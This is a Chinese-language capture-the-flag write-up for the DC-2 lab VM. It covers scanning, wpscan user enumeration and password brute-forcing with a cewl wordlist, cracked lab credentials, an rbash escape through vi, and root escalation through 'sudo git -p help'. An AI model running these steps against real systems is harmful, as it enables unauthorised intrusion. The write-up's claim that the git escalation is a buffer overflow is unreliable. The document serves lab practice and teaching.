DC-2靶场实操
一、环境配置
攻击机(kali):192.168.111.128
目的机(DC-2):IP未知,但在同一局域网内(得开启NAT模式)
二、实验步骤
1.信息收集
1.1确定IP地址
//通过netdiscover来确定对应网段中存活的主机
netdiscover -r 192.168.111.0/24
确定为==>192.168.111.131
1.2确定开放的端口
//通过nmap确定开放的端口来确定服务
nmap -A -p 1-65535 192.168.111.131
//-A:一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描
//-p:扫描指定端口,这里进行全扫描
发现开启了80端口和还有一个ssh服务器的7744端口
2.渗透
2.1访问80端口的web
发现访问不了,跳转到DC-2
2.1.1添加DNS记录
修改kali的host文件,host文件就是负责IP和一个域名解析的文件
在windows下这个文件在:C:\Windows\System32\drivers\etc\hosts
然而在kali里的话是在/etc/hosts这里,我们进去添加一条记录
再次访问即可。
2.2识别CMS类型
直接使用Wappalyzer插件,识别出为WordPress 4.7.10
2.3继续渗透
2.3.1页面中找寻需要的文件
点击目录下的FLAG目录
翻译:
你通常的单词列表可能不起作用,所以相反,也许你只需要被 cewl。更多的密码总是更好,但有时您无法赢得所有密码。以一个人的身份登录以查看下一个标志。如果找不到,请以其他人身份登录。
所以我们需要使用cewl来进行,生成字典,然后找一个可以登录的网站。
2.3.2目录扫描
//使用dirsearch工具进行目录扫描
dirsearch -u http://dc-2/ -e * -x 403 404
//-u:后面加入url
//-e:后接语言,例如php,asp,此处选*,即为全部
//-x:过滤的状态码,就是不显示出来
找到一个/wp-login.php
2.3.3访问php,爆破账号密码就好
使用cewl,生成密码字典
cewl http://dc-2/ -w /home/kali/Desktop/dict.txt
//-w:导入文件到其他目录
使用wpscan获取用户名
wpscan是一款专门针对WordPress的工具
wpscan --url http://dc-2 --enumerate u
wpscan --url http://dc-2 -e u
//两个是一样的
//扫描wordpress用户
扫出三个用户:admin、jerry、tom
这样就有账号和密码的两个文件
爆破账号密码
wpscan --url http://dc-2/ -U username.txt -P dict.txt
爆破出两个账号密码:
| Username | password |
|---|---|
| jerry | adipiscing |
| tom | parturient |
2.3.4登录jerry,找到flag2
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到另一个切入点。
2.3.5change个方向
80端口的web方向并没有我们想要的,换个思路,走ssh这条路
ssh [email protected] -p 7744
刚刚好在页面下发现flag3.txt
发现只有vi可以使用(cat、vim都不行)
2.3.6rbash提权
在看权限的时候,发现有限制
rbash逃逸方法简述:https://blog.csdn.net/qq_43168364/article/details/111830233
简单来说,使用vi提权
//1
vi test
//2,先Ece,再输入以下
:set shell=/bin/sh
:shell
//3 设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
//4 切换jerry用户
su jerry
2.3.7git提权
git提权的原理是:git存在缓冲区溢出漏洞,在使用sudo git -p help的时候,不需要输入root的密码即可使用root权限执行这个命令
先看有什么指令
sudo -l
sudo git -p help
!/bin/bash
//成功提权
2.3.8找flag文件
find / -name *flag*
三、知识总结
-
netdiscover
-
nmap
-
windows与kali所存放的dns记录的位置
-
dirsearch
-
cewl与WpScan
-
rbash提权
-
git提权